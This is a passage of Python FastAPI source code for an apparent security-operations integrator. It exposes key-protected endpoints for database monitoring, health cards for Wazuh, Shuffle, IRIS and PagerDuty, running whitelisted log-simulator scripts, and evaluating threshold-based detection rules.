  1470. "state": state,
  1471. }
  1472. )
  1473. @app.get(
  1474. "/monitor/db/tables",
  1475. response_model=ApiResponse,
  1476. dependencies=[Depends(require_internal_api_key)],
  1477. summary="List database tables",
  1478. description="List soc-integrator PostgreSQL tables with row count and relation size.",
  1479. )
  1480. async def monitor_db_tables() -> ApiResponse:
  1481. rows: list[dict[str, object]] = []
  1482. with get_conn() as conn, conn.cursor() as cur:
  1483. cur.execute(
  1484. """
  1485. SELECT
  1486. t.schemaname,
  1487. t.tablename,
  1488. COALESCE(s.n_live_tup, 0)::BIGINT AS estimated_rows,
  1489. COALESCE(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename)), 0)::BIGINT AS size_bytes,
  1490. COALESCE(pg_size_pretty(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename))), '0 bytes') AS size_pretty
  1491. FROM pg_tables t
  1492. LEFT JOIN pg_stat_user_tables s
  1493. ON s.schemaname = t.schemaname
  1494. AND s.relname = t.tablename
  1495. WHERE t.schemaname = 'public'
  1496. ORDER BY t.tablename
  1497. """
  1498. )
  1499. tables = cur.fetchall()
  1500. for item in tables:
  1501. schema = str(item.get("schemaname") or "public")
  1502. table = str(item.get("tablename") or "")
  1503. if not table:
  1504. continue
  1505. cur.execute(
  1506. sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
  1507. sql.Identifier(schema),
  1508. sql.Identifier(table),
  1509. )
  1510. )
  1511. count_row = cur.fetchone() or {}
  1512. row_count = int(count_row.get("cnt", 0) or 0)
  1513. rows.append(
  1514. {
  1515. "schema": schema,
  1516. "table": table,
  1517. "row_count": row_count,
  1518. "estimated_rows": int(item.get("estimated_rows", 0) or 0),
  1519. "size_bytes": int(item.get("size_bytes", 0) or 0),
  1520. "size_pretty": str(item.get("size_pretty") or "0 bytes"),
  1521. }
  1522. )
  1523. return ApiResponse(
  1524. data={
  1525. "database": settings.soc_integrator_db_name,
  1526. "generated_at": datetime.now(timezone.utc).isoformat(),
  1527. "tables": rows,
  1528. }
  1529. )
  1530. @app.get(
  1531. "/monitor/db/tables/{table_name}/rows",
  1532. response_model=ApiResponse,
  1533. dependencies=[Depends(require_internal_api_key)],
  1534. summary="List rows from selected table",
  1535. description="Return rows from a selected public table with pagination.",
  1536. )
  1537. async def monitor_db_table_rows(
  1538. table_name: str,
  1539. limit: int = 50,
  1540. offset: int = 0,
  1541. ) -> ApiResponse:
  1542. table = str(table_name or "").strip()
  1543. if not table:
  1544. raise HTTPException(status_code=400, detail="table_name is required")
  1545. page_limit = max(1, min(int(limit), 500))
  1546. page_offset = max(0, int(offset))
  1547. with get_conn() as conn, conn.cursor() as cur:
  1548. cur.execute(
  1549. """
  1550. SELECT 1
  1551. FROM pg_tables
  1552. WHERE schemaname = 'public' AND tablename = %s
  1553. LIMIT 1
  1554. """,
  1555. (table,),
  1556. )
  1557. if not cur.fetchone():
  1558. raise HTTPException(status_code=404, detail=f"table '{table}' not found in schema public")
  1559. cur.execute(
  1560. sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
  1561. sql.Identifier("public"),
  1562. sql.Identifier(table),
  1563. )
  1564. )
  1565. total_row = cur.fetchone() or {}
  1566. total = int(total_row.get("cnt", 0) or 0)
  1567. cur.execute(
  1568. sql.SQL("SELECT * FROM {}.{} ORDER BY 1 DESC LIMIT %s OFFSET %s").format(
  1569. sql.Identifier("public"),
  1570. sql.Identifier(table),
  1571. ),
  1572. (page_limit, page_offset),
  1573. )
  1574. rows = [dict(item) for item in (cur.fetchall() or [])]
  1575. return ApiResponse(
  1576. data={
  1577. "table": table,
  1578. "limit": page_limit,
  1579. "offset": page_offset,
  1580. "total": total,
  1581. "rows": rows,
  1582. }
  1583. )
  1584. @app.get(
  1585. "/monitor/systems",
  1586. response_model=ApiResponse,
  1587. dependencies=[Depends(require_internal_api_key)],
  1588. summary="Systems monitor overview",
  1589. description="Unified monitoring snapshot for Wazuh, Shuffle, IRIS, and PagerDuty with pipeline KPIs and recent records.",
  1590. )
  1591. async def monitor_systems(
  1592. minutes: int = 60,
  1593. limit: int = 20,
  1594. include_raw: bool = False,
  1595. ) -> ApiResponse:
  1596. window_minutes = max(1, minutes)
  1597. row_limit = max(1, limit)
  1598. now = datetime.now(timezone.utc)
  1599. since = now - timedelta(minutes=window_minutes)
  1600. now_iso = now.isoformat()
  1601. dependencies = await mvp_service.dependency_health()
  1602. monitor_state = getattr(app.state, "systems_monitor_state", {"last_ok_at": {}})
  1603. last_ok_at_by_key = monitor_state.setdefault("last_ok_at", {})
  1604. # KPI counters from persisted database records in the selected lookback window.
  1605. alerts_ingested = repo.count_incident_events_since(since=since, source="wazuh")
  1606. detections_matched = repo.count_c_detection_events_since(since=since)
  1607. iris_tickets_created = repo.count_incidents_with_iris_since(since=since)
  1608. pagerduty_escalations_sent = repo.count_escalations_since(since=since, success=True)
  1609. pagerduty_escalations_failed = repo.count_escalations_since(since=since, success=False)
  1610. wazuh_recent: list[object] = []
  1611. wazuh_recent_error: str | None = None
  1612. try:
  1613. wazuh_resp = await wazuh_adapter.list_manager_logs(limit=row_limit, offset=0, q=None, sort=None)
  1614. wazuh_recent = _extract_first_array(wazuh_resp)[:row_limit]
  1615. except Exception as exc:
  1616. wazuh_recent_error = str(exc)
  1617. shuffle_recent: list[object] = []
  1618. shuffle_recent_error: str | None = None
  1619. try:
  1620. workflows_resp = await shuffle_adapter.list_workflows()
  1621. workflows = _extract_first_array(workflows_resp)
  1622. for item in workflows[:row_limit]:
  1623. if isinstance(item, dict):
  1624. shuffle_recent.append(
  1625. {
  1626. "id": item.get("id") or item.get("workflow_id"),
  1627. "name": item.get("name") or item.get("workflow", {}).get("name"),
  1628. "status": item.get("status"),
  1629. }
  1630. )
  1631. else:
  1632. shuffle_recent.append(item)
  1633. except Exception as exc:
  1634. shuffle_recent_error = str(exc)
  1635. iris_recent: list[object] = []
  1636. iris_recent_error: str | None = None
  1637. try:
  1638. iris_resp = await iris_adapter.list_cases(limit=row_limit, offset=0)
  1639. iris_recent = _extract_first_array(iris_resp)[:row_limit]
  1640. except Exception as exc:
  1641. iris_recent_error = str(exc)
  1642. pagerduty_recent = repo.list_recent_escalations(limit=row_limit)
  1643. def build_card(
  1644. label: str,
  1645. dependency_key: str,
  1646. recent: list[object],
  1647. kpis: dict[str, object],
  1648. extra_error: str | None = None,
  1649. ) -> dict[str, object]:
  1650. dep = dependencies.get(dependency_key, {})
  1651. dep_status = str(dep.get("status") or "down")
  1652. status = "ok" if dep_status == "up" else "down"
  1653. if dep_status == "up":
  1654. last_ok_at_by_key[label] = now_iso
  1655. error_parts: list[str] = []
  1656. if dep.get("error"):
  1657. error_parts.append(str(dep.get("error")))
  1658. if extra_error:
  1659. error_parts.append(extra_error)
  1660. if dep_status == "up" and extra_error:
  1661. status = "degraded"
  1662. card: dict[str, object] = {
  1663. "status": status,
  1664. "latency_ms": dep.get("latency_ms"),
  1665. "last_ok_at": last_ok_at_by_key.get(label),
  1666. "last_error": " | ".join(error_parts) if error_parts else None,
  1667. "kpis": kpis,
  1668. "recent": recent,
  1669. }
  1670. if include_raw:
  1671. card["raw"] = dep.get("details")
  1672. return card
  1673. cards = {
  1674. "wazuh": build_card(
  1675. label="wazuh",
  1676. dependency_key="wazuh",
  1677. recent=wazuh_recent,
  1678. extra_error=wazuh_recent_error,
  1679. kpis={
  1680. "alerts_ingested": alerts_ingested,
  1681. "recent_rows": len(wazuh_recent),
  1682. },
  1683. ),
  1684. "shuffle": build_card(
  1685. label="shuffle",
  1686. dependency_key="shuffle",
  1687. recent=shuffle_recent,
  1688. extra_error=shuffle_recent_error,
  1689. kpis={
  1690. "recent_workflows": len(shuffle_recent),
  1691. },
  1692. ),
  1693. "iris": build_card(
  1694. label="iris",
  1695. dependency_key="iris",
  1696. recent=iris_recent,
  1697. extra_error=iris_recent_error,
  1698. kpis={
  1699. "tickets_created": iris_tickets_created,
  1700. "recent_rows": len(iris_recent),
  1701. },
  1702. ),
  1703. "pagerduty": build_card(
  1704. label="pagerduty",
  1705. dependency_key="pagerduty_stub",
  1706. recent=pagerduty_recent,
  1707. kpis={
  1708. "escalations_sent": pagerduty_escalations_sent,
  1709. "escalations_failed": pagerduty_escalations_failed,
  1710. },
  1711. ),
  1712. }
  1713. app.state.systems_monitor_state = monitor_state
  1714. return ApiResponse(
  1715. data={
  1716. "generated_at": now_iso,
  1717. "window_minutes": window_minutes,
  1718. "cards": cards,
  1719. "pipeline": {
  1720. "alerts_ingested": alerts_ingested,
  1721. "detections_matched": detections_matched,
  1722. "iris_tickets_created": iris_tickets_created,
  1723. "pagerduty_escalations_sent": pagerduty_escalations_sent,
  1724. "pagerduty_escalations_failed": pagerduty_escalations_failed,
  1725. },
  1726. }
  1727. )
  1728. @app.get(
  1729. "/sim/logs/runs",
  1730. response_model=ApiResponse,
  1731. dependencies=[Depends(require_internal_api_key)],
  1732. summary="List simulator runs",
  1733. description="List active and recent simulator script runs started from soc-integrator.",
  1734. )
  1735. async def sim_logs_runs() -> ApiResponse:
  1736. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1737. items: list[dict[str, object]] = []
  1738. for run_id, run in sim_runs.items():
  1739. serialized = _serialize_sim_run(run_id, run)
  1740. if (not serialized["running"]) and not run.get("stopped_at"):
  1741. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1742. serialized["stopped_at"] = run["stopped_at"]
  1743. items.append(serialized)
  1744. items.sort(key=lambda x: str(x.get("started_at") or ""), reverse=True)
  1745. return ApiResponse(data={"items": items})
  1746. @app.post(
  1747. "/sim/logs/start",
  1748. response_model=ApiResponse,
  1749. dependencies=[Depends(require_internal_api_key)],
  1750. summary="Start simulator logs script",
  1751. description="Start a whitelisted simulator script in background and return run metadata.",
  1752. )
  1753. async def sim_logs_start(payload: SimLogRunRequest) -> ApiResponse:
  1754. script_name = SIM_SCRIPT_MAP[payload.script]
  1755. script_path = SIM_SCRIPTS_DIR / script_name
  1756. if not script_path.exists():
  1757. raise HTTPException(status_code=400, detail=f"Simulator script not found in container: {script_name}")
  1758. cmd = _build_sim_command(payload)
  1759. env = dict(os.environ)
  1760. env.setdefault("WAZUH_SYSLOG_HOST", "wazuh.manager")
  1761. env.setdefault("WAZUH_SYSLOG_PORT", "514")
  1762. run_id = str(uuid.uuid4())
  1763. log_file = SIM_RUN_LOGS_DIR / f"{run_id}.log"
  1764. log_handle = None
  1765. try:
  1766. log_handle = log_file.open("ab")
  1767. process = subprocess.Popen(
  1768. cmd,
  1769. cwd=str(SIM_SCRIPTS_DIR),
  1770. env=env,
  1771. stdout=log_handle,
  1772. stderr=subprocess.STDOUT,
  1773. start_new_session=True,
  1774. )
  1775. except Exception as exc:
  1776. if log_handle:
  1777. try:
  1778. log_handle.close()
  1779. except Exception:
  1780. pass
  1781. raise HTTPException(status_code=502, detail=f"Failed to start simulator: {exc}") from exc
  1782. finally:
  1783. if log_handle:
  1784. log_handle.close()
  1785. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1786. sim_runs[run_id] = {
  1787. "script": payload.script,
  1788. "target": payload.target,
  1789. "scenario": payload.scenario,
  1790. "count": payload.count,
  1791. "delay_seconds": payload.delay_seconds,
  1792. "forever": payload.forever,
  1793. "pid": process.pid,
  1794. "cmd": " ".join(shlex.quote(part) for part in cmd),
  1795. "started_at": datetime.now(timezone.utc).isoformat(),
  1796. "stopped_at": None,
  1797. "return_code": None,
  1798. "log_file": str(log_file),
  1799. "process": process,
  1800. }
  1801. app.state.sim_runs = sim_runs
  1802. return ApiResponse(data={"run": _serialize_sim_run(run_id, sim_runs[run_id])})
  1803. @app.post(
  1804. "/sim/logs/stop/{run_id}",
  1805. response_model=ApiResponse,
  1806. dependencies=[Depends(require_internal_api_key)],
  1807. summary="Stop simulator run",
  1808. description="Stop a running simulator script by run_id.",
  1809. )
  1810. async def sim_logs_stop(run_id: str) -> ApiResponse:
  1811. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1812. run = sim_runs.get(run_id)
  1813. if not run:
  1814. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1815. process = run.get("process")
  1816. if process and process.poll() is None:
  1817. try:
  1818. process.terminate()
  1819. process.wait(timeout=3)
  1820. except subprocess.TimeoutExpired:
  1821. process.kill()
  1822. except Exception as exc:
  1823. raise HTTPException(status_code=502, detail=f"Failed to stop run: {exc}") from exc
  1824. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1825. return ApiResponse(data={"run": _serialize_sim_run(run_id, run)})
  1826. @app.post(
  1827. "/sim/logs/stop-running",
  1828. response_model=ApiResponse,
  1829. dependencies=[Depends(require_internal_api_key)],
  1830. summary="Stop all running simulator runs",
  1831. description="Stop all currently running simulator scripts (including forever mode).",
  1832. )
  1833. async def sim_logs_stop_running() -> ApiResponse:
  1834. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1835. stopped: list[dict[str, object]] = []
  1836. already_stopped = 0
  1837. for run_id, run in sim_runs.items():
  1838. process = run.get("process")
  1839. if process and process.poll() is None:
  1840. try:
  1841. process.terminate()
  1842. process.wait(timeout=3)
  1843. except subprocess.TimeoutExpired:
  1844. process.kill()
  1845. except Exception as exc:
  1846. raise HTTPException(status_code=502, detail=f"Failed to stop run {run_id}: {exc}") from exc
  1847. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1848. stopped.append(_serialize_sim_run(run_id, run))
  1849. else:
  1850. already_stopped += 1
  1851. return ApiResponse(
  1852. data={
  1853. "stopped_count": len(stopped),
  1854. "already_stopped_count": already_stopped,
  1855. "runs": stopped,
  1856. }
  1857. )
  1858. @app.get(
  1859. "/sim/logs/output/{run_id}",
  1860. response_model=ApiResponse,
  1861. dependencies=[Depends(require_internal_api_key)],
  1862. summary="Get simulator run output",
  1863. description="Return tailed output lines from simulator run log file.",
  1864. )
  1865. async def sim_logs_output(run_id: str, limit: int = 200) -> ApiResponse:
  1866. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1867. run = sim_runs.get(run_id)
  1868. if not run:
  1869. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1870. log_file_path = run.get("log_file")
  1871. if not log_file_path:
  1872. raise HTTPException(status_code=404, detail=f"No log file for run: {run_id}")
  1873. log_file = Path(str(log_file_path))
  1874. lines = _tail_log_lines(log_file, limit=limit)
  1875. process = run.get("process")
  1876. running = bool(process and process.poll() is None)
  1877. return ApiResponse(
  1878. data={
  1879. "run_id": run_id,
  1880. "running": running,
  1881. "line_count": len(lines),
  1882. "lines": lines,
  1883. "text": "\n".join(lines),
  1884. "log_file": str(log_file),
  1885. }
  1886. )
  1887. @app.get(
  1888. "/sim/logs/wazuh-latest/{run_id}",
  1889. response_model=ApiResponse,
  1890. dependencies=[Depends(require_internal_api_key)],
  1891. summary="Get latest Wazuh logs/rules for simulator run",
  1892. description="Return latest Wazuh event logs and matched rules correlated to a simulator run.",
  1893. )
  1894. async def sim_logs_wazuh_latest(
  1895. run_id: str,
  1896. limit: int = 50,
  1897. minutes: int = 15,
  1898. include_raw: bool = False,
  1899. ) -> ApiResponse:
  1900. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1901. run = sim_runs.get(run_id)
  1902. if not run:
  1903. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1904. requested_minutes = max(1, int(minutes))
  1905. # Keep query unfiltered and use a wide lookback to emulate Discover "latest records".
  1906. effective_minutes = max(1440, requested_minutes)
  1907. query_limit = max(1, min(int(limit), 200))
  1908. query_text = "*"
  1909. try:
  1910. raw = await wazuh_adapter.search_alerts(
  1911. query=query_text,
  1912. limit=query_limit,
  1913. minutes=effective_minutes,
  1914. )
  1915. except Exception as exc:
  1916. raise HTTPException(status_code=502, detail=f"Wazuh search failed: {exc}") from exc
  1917. hits = _extract_wazuh_hits(raw)
  1918. events = [_extract_wazuh_event_item(hit, include_raw=include_raw) for hit in hits]
  1919. rules: list[dict[str, object]] = []
  1920. for hit in hits:
  1921. rule_item = _extract_wazuh_rule_item(hit, include_raw=include_raw)
  1922. if rule_item:
  1923. rules.append(rule_item)
  1924. return ApiResponse(
  1925. data={
  1926. "run": _serialize_sim_run(run_id, run),
  1927. "query": {
  1928. "effective_minutes": effective_minutes,
  1929. "text": query_text,
  1930. "limit": query_limit,
  1931. },
  1932. "events": events,
  1933. "rules": rules,
  1934. "totals": {
  1935. "events": len(events),
  1936. "rules": len(rules),
  1937. },
  1938. }
  1939. )
  1940. @app.post(
  1941. "/monitor/log-loss/check",
  1942. response_model=ApiResponse,
  1943. dependencies=[Depends(require_internal_api_key)],
  1944. summary="Check log loss",
  1945. description="Check expected telemetry streams for missing logs in a configurable lookback window.",
  1946. )
  1947. async def monitor_log_loss_check(
  1948. payload: LogLossCheckRequest | None = None,
  1949. create_ticket: bool = False,
  1950. ) -> ApiResponse:
  1951. req = payload or LogLossCheckRequest()
  1952. result = await _execute_log_loss_check(req=req, create_ticket=create_ticket)
  1953. return ApiResponse(data=result)
  1954. @app.post(
  1955. "/monitor/c-detections/evaluate",
  1956. response_model=ApiResponse,
  1957. dependencies=[Depends(require_internal_api_key)],
  1958. summary="Evaluate Appendix C detections",
  1959. description="Evaluate C1-C3 detection rules on recent events, optionally creating incidents/tickets.",
  1960. )
  1961. async def monitor_c_detections_evaluate(payload: CDetectionEvaluateRequest) -> ApiResponse:
  1962. if not settings.c_detection_enabled:
  1963. raise HTTPException(status_code=400, detail="C detection is disabled by configuration")
  1964. started_at = datetime.now(timezone.utc).isoformat()
  1965. app.state.c_detection_state["last_started_at"] = started_at
  1966. try:
  1967. raw = await wazuh_adapter.search_alerts(
  1968. query=payload.query,
  1969. limit=max(1, payload.limit),
  1970. minutes=max(1, payload.minutes),
  1971. )
  1972. hits = (raw.get("hits", {}) or {}).get("hits", []) if isinstance(raw, dict) else []
  1973. normalized = [mvp_service.normalize_wazuh_hit(hit) for hit in hits]
  1974. evaluated = await c_detection_service.evaluate(normalized, selectors=payload.selectors)
  1975. records: list[dict[str, object]] = []
  1976. for match in evaluated.get("matches", []):
  1977. usecase_id = str(match.get("usecase_id") or "")
  1978. entity = str(match.get("entity") or "unknown")
  1979. severity = str(match.get("severity") or "medium")
  1980. evidence = dict(match.get("evidence") or {})
  1981. event_ref = {
  1982. "event_id": ((match.get("event") or {}).get("event_id")),
  1983. "timestamp": ((match.get("event") or {}).get("timestamp")),
  1984. "source": ((match.get("event") or {}).get("source")),
  1985. }
  1986. in_cooldown = repo.is_c_detection_in_cooldown(
  1987. usecase_id=usecase_id,
  1988. entity=entity,
  1989. cooldown_seconds=int(settings.c_detection_ticket_cooldown_seconds),
  1990. )
  1991. incident_key: str | None = None
  1992. event_row = repo.add_c_detection_event(
  1993. usecase_id=usecase_id,
  1994. entity=entity,
  1995. severity=severity,
  1996. evidence=evidence,
  1997. event_ref=event_ref,
  1998. incident_key=None,
  1999. )
  2000. if (not payload.dry_run) and settings.c_detection_create_iris_ticket and not in_cooldown:
  2001. incident_event = _c_match_to_incident_event(match)
  2002. ingest = await mvp_service.ingest_incident(incident_event)
  2003. incident_key = str(ingest.get("incident_key") or "") or None
  2004. repo.update_c_detection_incident(int(event_row["id"]), incident_key)
  2005. records.append(
  2006. {
  2007. "id": event_row["id"],
  2008. "usecase_id": usecase_id,
  2009. "entity": entity,
  2010. "severity": severity,
  2011. "incident_key": incident_key,
  2012. "cooldown_active": in_cooldown,
  2013. "evidence": evidence,
  2014. }
  2015. )
  2016. result = {
  2017. "query": payload.query,
  2018. "minutes": max(1, payload.minutes),
  2019. "selectors": payload.selectors,
  2020. "dry_run": payload.dry_run,
  2021. "summary": evaluated.get("summary", {}),
  2022. "matches": records,
  2023. "total_hits": len(hits),
  2024. }
  2025. app.state.c_detection_state["last_status"] = "ok"
  2026. app.state.c_detection_state["last_result"] = result
  2027. app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  2028. return ApiResponse(data=result)
  2029. except Exception as exc:
  2030. app.state.c_detection_state["last_status"] = "error"
  2031. app.state.c_detection_state["last_error"] = str(exc)
  2032. app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  2033. raise HTTPException(status_code=502, detail=f"C detection evaluation failed: {exc}") from exc
  2034. @app.get(
  2035. "/monitor/c-detections/history",
  2036. response_model=ApiResponse,
  2037. dependencies=[Depends(require_internal_api_key)],
  2038. summary="C detection history",
  2039. description="List persisted C1-C3 detection matches, including evidence and linked incident keys.",
  2040. )
  2041. async def monitor_c_detections_history(
  2042. limit: int = 50,
  2043. offset: int = 0,
  2044. usecase_id: str | None = None,
  2045. ) -> ApiResponse:
  2046. rows = repo.list_c_detection_events(limit=limit, offset=offset, usecase_id=usecase_id)
  2047. return ApiResponse(data={"items": rows, "limit": max(1, limit), "offset": max(0, offset), "usecase_id": usecase_id})
  2048. @app.get(
  2049. "/monitor/c-detections/state",
  2050. response_model=ApiResponse,
  2051. dependencies=[Depends(require_internal_api_key)],
  2052. summary="C detection state",
  2053. description="Return Appendix C detection settings and last evaluation runtime state.",
  2054. )
  2055. async def monitor_c_detections_state() -> ApiResponse:
  2056. return ApiResponse(
  2057. data={
  2058. "enabled": settings.c_detection_enabled,
  2059. "settings": {
  2060. "window_minutes": settings.c_detection_window_minutes,
  2061. "c1_max_travel_speed_kmph": settings.c1_max_travel_speed_kmph,
  2062. "c2_offhours_start_utc": settings.c2_offhours_start_utc,
  2063. "c2_offhours_end_utc": settings.c2_offhours_end_utc,
  2064. "c3_host_spread_threshold": settings.c3_host_spread_threshold,
  2065. "c3_scan_port_threshold": settings.c3_scan_port_threshold,
  2066. "create_iris_ticket": settings.c_detection_create_iris_ticket,
  2067. "ticket_cooldown_seconds": settings.c_detection_ticket_cooldown_seconds,
  2068. },
  2069. "state": getattr(app.state, "c_detection_state", {}),
  2070. }
  2071. )